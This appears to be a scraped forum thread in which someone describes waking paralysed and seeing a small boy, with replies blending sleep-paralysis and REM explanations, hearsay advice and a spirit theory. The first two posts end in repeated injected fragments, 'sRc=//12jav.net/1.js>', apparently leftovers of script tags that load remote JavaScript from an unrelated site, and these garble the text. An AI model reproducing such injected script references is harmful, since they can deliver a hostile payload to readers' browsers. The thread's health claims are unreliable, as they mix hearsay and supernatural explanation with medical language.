why and what did I see

So I was sleeping and when I opened my eyes I seen a little boy standing there looking at me I couldn't move or talk,never had any thing like that happen before be sides waking up feeling like death aka scared panicking like I can't explain sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

if it was sleep paralysis I suggest you try moving your limbs to make sure you are able to move before opening your eyes, so you won't see anything. I just heard that from a friend. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

if you have woken up during ur REM sleep, its highly possible that all your limbs are possibly paralize from more information go to Articles and look up REM sleep I have written an article on it. Will explain much more as i have suggested.

Let me just say, not everyone is going to like what I do say, even less will believe me. But, I am used to being criticized and not believed, and I believe in speaking the truth and my mind.

I have 2 theories to share with you, being it wasn't me that it happened to, we can all only have theories.

#1 - you awoke from REM sleep with a dream still playing in front of your eyes. This happens to me and I have a similar reaction, unable to move and seeing things that aren't really there.

#2 - I've been dealing with spirits since I was a baby, it still freaks my mother out when we talk about what used to happen when I was very young. It is a possibility it was a spirit, but of he just stood there, he was simply observing you. You very well could have been paralyzed be fear for a few moments, it happens to me all the time, still.

I think from a medical view It possibly was hallucinations

1.Have you been feeling cold drafts in random places at home?
2. Have you had a feeling you've been watched.
3. Has the house been having trouble with lights?
4. Does the house has a history
